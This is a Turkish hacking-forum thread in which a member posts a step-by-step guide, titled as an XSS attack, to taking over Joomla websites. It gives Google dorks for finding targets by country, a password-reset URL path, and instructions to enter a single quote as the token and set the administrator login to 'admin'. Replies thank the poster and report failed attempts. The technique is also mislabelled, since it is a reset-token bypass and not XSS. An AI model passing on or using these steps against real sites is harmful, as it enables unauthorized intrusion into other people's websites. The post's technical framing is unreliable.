☆XSS Açığı Üzerinden Site Hacklemek//Stajyer☆

ViceXx

Katılımcı Üye
8 Ocak 2017
627
1
23
Berlin
Herkeze merhabalar;
Bugün size XSS açığı ile site hacklemeyi anlatıcam.


1. Googleye açın ve bunu yazın
Kod:
Kod:
/index.php?&option=com
Not: Mesela Hollanda sitesini hacklemek istiyorsanız
Kod:
Kod:
/index.php?&option=com site:nl
yapmanız lazım.
Mesela rusya istiyorsanız
Kod:
Kod:
/index.php?&option=com site:ru
ülke domainlerini googlede bulabilirsiniz zaten


2.Bir siteye tıklayın

3. altaki resimdeki gibi (/) eğik çizgiye kadar silin

not: (/) eğik çizgiyi silmeyin

7581incim2233448.png





4. sildiğimiz yere bunu yapıştırın
Kod:
Kod:
index.php?option=com_user&view=reset&layout=confirm
765incix1042447.png





5.enter'a basın


6.karşınıza
Kod:
code:
diye yazı çıkacak . başka yazılarda olabilir . bu sadece örnekti


7. code:
yazan yere, tırnak işareti koyun
Kod:
Kod:
'

3271incif4012256.png



8.göndere basın (ben türkçe diline çevirdiğim için gönder yazıyor sizde başka bişey yazabilir




9.aşağıdaki resim gibi bişey gelicek .
kullancı adını admin yapın
şifreyi admin yapın


Kod:
http://imgim.com/6619incis1603664.png


10. Artık siteye yönetici olarak giriş yapabilirsiniz ve hackleyebilirsiniz:)



İnşallah Yararlı Olur:)
Görseller bana ait değildir :)
Anlatim bana aittir:)
Kendinize iyi bakin:)
 
Son düzenleme:

MyGf

Kıdemli Üye
16 Tem 2016
3,278
5
Hall of Fame
Dostum bu dork ne işe yarıyor anlatsan daha iyi olurdu. Bildiğim kadarıyla yetkili olmadığın halde admin şifre değiştirebiliyorsun.
Bu da admin bypass gibi işliyor.
Eline sağlık :)

Edit:10 dakikadır deniyorum 1 site gelmedi :)
 
Son düzenleme:

OmerFarukHan

Uzman üye
18 Mar 2017
1,605
0
Sinop
Hocam elinize sağlık hemen denemeliyim

başka bir sitede denedim bu çıktı

Not Found

The requested URL /index.php was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an Error******** to handle the request.

Girdimde code değil direk admin paneline yolluyor :D ne yapacağım admin admin yaptım olmadı
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.